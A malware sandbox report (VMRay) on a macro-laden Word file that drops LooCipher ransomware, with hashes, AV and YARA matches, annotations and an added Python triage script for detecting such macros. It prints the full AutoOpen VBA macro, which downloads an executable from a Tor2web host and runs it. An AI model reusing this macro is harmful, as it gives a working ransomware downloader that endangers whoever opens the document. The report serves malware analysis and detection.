e824650b...1486 | Files
VTI SCORE: 100/100
Dynamic Analysis Report (VMRay Analyzer)
Classification: Downloader

Sample File (Word Document, Malicious)
Filename: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Category: Sample File
Type: Word Document
Severity: Malicious
Mime Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File Size: 21.91 KB
MD5: 868a06468b0eb6d5e9777681a0cb2afe
SHA1: 2551e34c72e928f615aeba3b7c2a099b3adcb84e
SHA256: e824650b66c5cdd8c71983f4c4fc0e1ac55cd04809d562f3b6b4790a28521486
SSDeep: 384:KS9ASfotpAEi8F1c2OfzHt/PRbeRGNr1aBVJmDm1nTfuUQ:pAtplFDfOdBe4YBZtQ
Office Information
Revision: 1
Create Time: 2019-06-17 07:54:00+00:00
Modify Time: 2019-06-17 07:54:00+00:00
Revision 1 with identical create and modify times means the document was saved exactly once after creation.
Document Information
Application: Microsoft Office Word
App Version: 16.0000
Template: Normal
Document Security: SecurityFlag.NONE
Page Count: 1
Line Count: 1
Paragraph Count: 1
Word Count: 5
Character Count: 31
Chars With Spaces: 35
Heading Pairs: Título (Spanish for "Title"; the heading-pair label is written by Word in the UI language of the authoring installation, so this points to a Spanish-locale Word)
ScaleCrop: False
SharedDoc: False
Controls (1)
CLSID: {0003000C-0000-0000-C000-000000000046}
Control Name: Package
Associated Vulnerability: EmbeddedFile
This CLSID is the OLE Packager object, which embeds an arbitrary file inside the document; its presence is what the analyzer flags as EmbeddedFile.
VBA Macros (1)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' AutoOpen runs as soon as the document is opened with macros enabled; no further user action is needed.
Sub AutoOpen()

' Late-bound COM objects: an HTTP client to fetch the payload and a binary stream to write it to disk.
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
' Synchronous GET over plain HTTP. The hostname follows the Tor2web convention
' (<onion-address>.onion.<gateway-domain>), so the real server is a Tor hidden service reached through a clearnet gateway.
xHttp.Open "GET", "http://hcwyo5rfapkytajg.onion.pet/2hq68vxr3f.exe", False
xHttp.Send

With bStrm
 .Type = 1 '//binary (adTypeBinary)
 .Open
 .write xHttp.responseBody
 ' Relative path: the file lands in the Word process's current directory. 2 = adSaveCreateOverWrite.
 .savetofile "LooCipher.exe", 2 '//overwrite
End With

' Launch the downloaded binary; Shell returns immediately without waiting for it to exit.
Shell ("LooCipher.exe")

End Sub
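The following is an added example, not VMRay's code and not part of the original report: a static triage script that reproduces the two checks behind the YARA hits listed below (download commands and execution commands) and pulls the indicators out of Macro #1: the auto-exec entry point, the COM ProgIDs, the payload URL, the dropped filename, and the .onion service hidden behind the Tor2web gateway hostname. The ProgID-to-capability table, the regular expressions and the verdict rule are my own heuristics; the Tor2web naming convention (<onion-address>.onion.<gateway-domain>) is an assumption used for the onion extraction.

```python
"""Static VBA triage for the download-and-execute pattern.
Added example, not VMRay's code: it mirrors the report's two YARA checks
(download commands, execution commands) and extracts the indicators."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Entry points that run as soon as macros are enabled (Word and Excel names).
AUTOEXEC_SUBS = {"autoopen", "auto_open", "autoexec", "document_open",
                 "workbook_open", "autoclose", "auto_close", "document_close"}
# COM ProgIDs a dropper instantiates, keyed by the capability each one gives it.
PROGID_CAPABILITY = {
    "microsoft.xmlhttp": "network", "msxml2.xmlhttp": "network",
    "msxml2.serverxmlhttp": "network", "winhttp.winhttprequest.5.1": "network",
    "adodb.stream": "file_write", "scripting.filesystemobject": "file_write",
    "wscript.shell": "execution", "shell.application": "execution",
}
STRING_RE = re.compile(r'"(?:[^"]|"")*"')          # VBA literal, "" escapes a quote
SUB_RE = re.compile(r"^\s*(?:public\s+|private\s+)?sub\s+(\w+)", re.I)
CREATEOBJECT_RE = re.compile(r'createobject\s*\(\s*"([^"]+)"', re.I)
URL_RE = re.compile(r'"((?:https?|ftp)://[^"\s]+)"', re.I)
SAVETOFILE_RE = re.compile(r'\.savetofile\s+"([^"]+)"', re.I)
# Applied only to code with literals blanked, so the ProgID "WScript.Shell"
# inside a string is not mistaken for a call.
EXEC_CALL_RE = re.compile(r"\b(shell|shellexecute|run|exec)\b", re.I)
# Assumed Tor2web convention: <onion-address>.onion.<gateway-domain>; the payload
# host in this report, hcwyo5rfapkytajg.onion.pet, has that shape.
TOR2WEB_RE = re.compile(r"^([a-z2-7]{16,56})\.onion\.[a-z0-9.-]+$", re.I)


def split_line(line):
    """Return (code, code with string literals blanked), both without the
    trailing ' comment. Literals become same-length placeholders first so an
    apostrophe inside a string is not taken for the comment marker."""
    bare = STRING_RE.sub(lambda m: '"' + "_" * (len(m.group()) - 2) + '"', line)
    cut = bare.find("'")
    if cut >= 0:
        line, bare = line[:cut], bare[:cut]
    return line, bare


@dataclass
class Triage:
    autoexec: list = field(default_factory=list)
    com_objects: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    onion_services: list = field(default_factory=list)
    dropped_files: list = field(default_factory=list)
    capabilities: set = field(default_factory=set)  # network/file_write/execution

    @property
    def verdict(self):
        if {"network", "execution"} <= self.capabilities:
            return "Downloader"  # fetch + run: the report's classification
        return "Suspicious" if self.capabilities else "No download/execute pattern"


def triage_vba(source):
    """Scan VBA source line by line, collecting capabilities and indicators."""
    t = Triage()
    for raw in source.splitlines():
        code, bare = split_line(raw)
        m = SUB_RE.match(bare)
        if m and m.group(1).lower() in AUTOEXEC_SUBS:
            t.autoexec.append(m.group(1))
        for progid in CREATEOBJECT_RE.findall(code):
            t.com_objects.append(progid)
            cap = PROGID_CAPABILITY.get(progid.lower())
            if cap:
                t.capabilities.add(cap)
        for url in URL_RE.findall(code):
            t.urls.append(url)
            gw = TOR2WEB_RE.match(urlparse(url).hostname or "")
            if gw:
                t.onion_services.append(gw.group(1).lower() + ".onion")
        for name in SAVETOFILE_RE.findall(code):
            t.dropped_files.append(name)
            t.capabilities.add("file_write")
        if EXEC_CALL_RE.search(bare):
            t.capabilities.add("execution")
    return t


# Macro #1 (ThisDocument) as shown in the report above, blank lines dropped.
REPORT_MACRO = '''Sub AutoOpen()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "http://hcwyo5rfapkytajg.onion.pet/2hq68vxr3f.exe", False
xHttp.Send
With bStrm
 .Type = 1 '//binary
 .Open
 .write xHttp.responseBody
 .savetofile "LooCipher.exe", 2 '//overwrite
End With
Shell ("LooCipher.exe")
End Sub'''

if __name__ == "__main__":
    r = triage_vba(REPORT_MACRO)
    print(r.verdict, r.autoexec, r.urls, r.onion_services, r.dropped_files)
```

Blanking string literals before looking for Shell/Run/Exec is the detail that keeps this from firing on benign macros that merely mention those words in a message box, while the ProgID table still catches a WScript.Shell instantiated through CreateObject. Pipe the output of olevba or a similar extractor into triage_vba to apply the same check to other documents.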
Local AV Matches (1)
Threat Name: VB:Trojan.Emeka.556
Severity: Malicious
YARA Matches (2)
Rule Name: VBA_Download_Commands
Rule Description: VBA macro may attempt to download external content; possible dropper
Severity: Suspicious
Rule Name: VBA_Execution_Commands
Rule Description: VBA macro may execute files or system commands
Severity: Suspicious
Downloaded File (Binary, Malicious)
Also Known As: LooCipher.exe (Downloaded File)
Parent File: analysis.pcap
Mime Type: application/vnd.microsoft.portable-executable
File Size: 5.38 MB
MD5: 0c7e59536a7be4a446bbe8b4f22e5880
SHA1: 1d1df205acf0efd78cda6994a1bb9780a5b7b005
SHA256: 43cfb0a439705ab2bd7c46b39a7265ff0a14f7bd710b3e1432a9bdc4c1736c49
SSDeep: 98304:+d+KQ0CO444hl1p7xFMe7rbbbbLG6wd57qw:+d+KQ0R44Q1rbbbbLG5
Local AV Matches (1)
Threat Name: Gen:Heur.Ransom.Imps.3
Severity: Malicious
Embedded File (Unknown type, Malicious)
Parent File: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type: application/CDFV2
File Size: 13.00 KB
MD5: 92427cabd40527932e36bd20ab1e1f3d
SHA1: 551fe4b86eb5c1553340d48d311276d05d81228e
SHA256: 9e85d5b14d6d482eaa03c358dd0a88cf1fb215f26a872ad11623e7e56042486d
SSDeep: 192:IjqvPLXX2RkwjjHBN0joItdRdw+1tIE2btUERghgaV:ES6RkwjjBN0joSd11tZ2btUERgN
Local AV Matches (1)
Threat Name: VB:Trojan.Emeka.556
Severity: Malicious
The same signature that fires on the parent document fires on this embedded OLE (CDFV2) container, consistent with it being the vbaProject.bin part that holds Macro #1.
Embedded File (Text, Whitelisted)
Parent File: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type: text/xml
File Size: 1.93 KB
MD5: 7045c063e042d03034555eab2f8afb05
SHA1: 2c950c9579298ec8204ef62b76496aa8687736e2
SHA256: 3b9f80d501595c4f910f60925f6db78dc0997ce5c25299e4f18ea7f5b9573616
SSDeep: 48:c01naQ6NYPi6NY6UX6NYRz6NYyD6NYAG6NYVh7Q0HpQS6NYV06NYQN6NYrd6NY/D:B1naQ6mPi6mTX6mRz6myD6mAG6mVh7Q6
File Reputation Information
Severity: Whitelisted
First Seen: 2014-03-11 01:53 (UTC+1)
Last Seen: 2018-04-29 07:41 (UTC+2)
Embedded File (Text, Whitelisted)
Parent File: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type: text/xml
File Size: 277 bytes
MD5: dd79e6440b0515bfcf771c2c5286a2c8
SHA1: 40dc1e00e2663cb33f8c296cdb0cd52fa07a87b6
SHA256: c97833e6456aa2bfe9be614f9c3ae41a8ef764b1cc3af92c6a6f273c62309122
SSDeep: 6:TMVBd6OjzmC3mUifmReUdzXxjmUA+DYQXzReYX9v48sEJ:TMHdtWa6fmEUdzXV4+DYQDEEQWJ
File Reputation Information
Severity: Whitelisted
First Seen: 2012-11-16 07:03 (UTC+1)
Last Seen: 2019-06-11 12:54 (UTC+2)
Dropped File (Stream, Unknown)
Filename: C:\ProgramData\Adobe\ARM\Reader_10.0.0\AdobeARM.bin.lcphr
Mime Type: application/octet-stream
File Size: 373.52 KB
MD5: f0a40ada59708f155a8700133c54b289
SHA1: 2c28fe1417757863a83a41de38b1ace2ebaea652
SHA256: c31b61eb49f93a0eae27053e7a00b3a4b5ee3500405853a77040ef4de80cf180
SSDeep: 6144:2s2dV0PvvRN9ONaFhEZW/9zP+jTG0OTW9qddRj/qTh67xBf821ct7f6scUh7wlV:23kNqKhfPm9qN/qThy11ctj6JUO
Note: an opaque 373 KB blob written next to an existing AdobeARM.bin with an added .lcphr extension, taken together with the ransomware heuristic (Gen:Heur.Ransom.Imps.3) on the downloaded LooCipher.exe, is consistent with the payload having encrypted that file during the run; the sample's Downloader classification covers only the document itself.
Embedded File (Text, Unknown)
Parent File: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type: text/xml
File Size: 1.41 KB
MD5: a3c9f5860d9f685ff8f3bbe00d59919e
SHA1: 38ccee2b895a9eeb800d3619d6ad0c2585fa7e6f
SHA256: 0a50c25bbd1134733079dd0ab22bff0f2e5f1082e0b76ed740669deec6c3211f
SSDeep: 24:2dtAQNC++RrG+Wf0BAmflYYflEb87++RncfQnuBcfrf++BC++h++l++RKd++Racl:cWQv+fWc6mNYYNEbz+qliS+B1+4+s+He
Embedded File (Text, Unknown)
Parent File: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type: text/xml
File Size: 1.78 KB
MD5: b046b628a28b27a1fc45392bcbb54764
SHA1: 8e87b4940b7fbbb147f3274123e0ce9955746e2a
SHA256: 0b22134e7a1751128697fb648f51ef632f4f8b8a68fcf18d5f8713893f8bc25e
SSDeep: 48:cpv+fWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+pfvhgvK:UmWc6mmY+bzZliSwT/iZoq
Embedded File (Text, Unknown)
Parent File: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type: text/xml
File Size: 1.79 KB
MD5: 1682741710c5ad8016ccef797483b8e2
SHA1: 45f57f03a52761dbe0f19d32bd74e4518e9fc3dd
SHA256: 5102245399f5af62a0bf031d9fc382841a258de75c978c87e62871c8fc733a96
SSDeep: 48:c4v+fWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+pPAvkIgvi:9mWc6mmY+bzZliSwT/iZoOnS
Embedded File (Text, Unknown)
Parent File: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type: text/xml
File Size: 2.37 KB
MD5: 68ad04bdf4ab43e0bc72941e190d2d2f
SHA1: a6d76a20e95a4f9bd0198f9e25b985315d20c1bf
SHA256: 761f2031d899d0378790355da98adc78bfffdcf6bd9f12a0f58979389b7a4e75
SSDeep: 48:cAv+fWc6mNYYNEbz+qliS+B1+4+s+H+Uv+L+pwP7pM32PvLzH4ok+I8K:vmWc6mmY+bzZliSwT/iZoF820p
Embedded File (Text, Unknown)
Parent File: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type: text/xml
File Size: 1.41 KB
MD5: df8fe38075b90b45dcb3cabeaf3ba3a9
SHA1: b469d8ded7970a9fe01267a47256a956c704ca97
SHA256: a75a028b132b1186680e401114909782fce3d349134e817081ad4e324bd1b68b
SSDeep: 24:2dtJNC++RrG+Wf0BAmflYYflEb87++RncfQnuBcfrf++BC++h++l++RKd++Rac+6:cfv+fWc6mNYYNEbz+qliS+B1+4+s+H+t
Embedded File (Text, Unknown)
Parent File: C:\Users\aETAdzjz\Desktop\Info_Project_BSV_2019.docm
Mime Type: text/xml
File Size: 2.92 KB
MD5: 50165c3532505ea7e36b48f04c8d827f
SHA1: 2e869ea97a5bfdf81c044377c57dff5f1b73c200
SHA256: bffc0c689379c0240d22d4c0dc9955752a6094928569803d1462e1fa06325d38
SSDeep: 48:ciec6mNYYNEbliS+B1+4+kopb1S4QxoM+lqM+IyM+wM+wM+LbXWnle6AayVK2gYm:+c6mmY+bliSwTNCpS4QxNExbuE/2ga6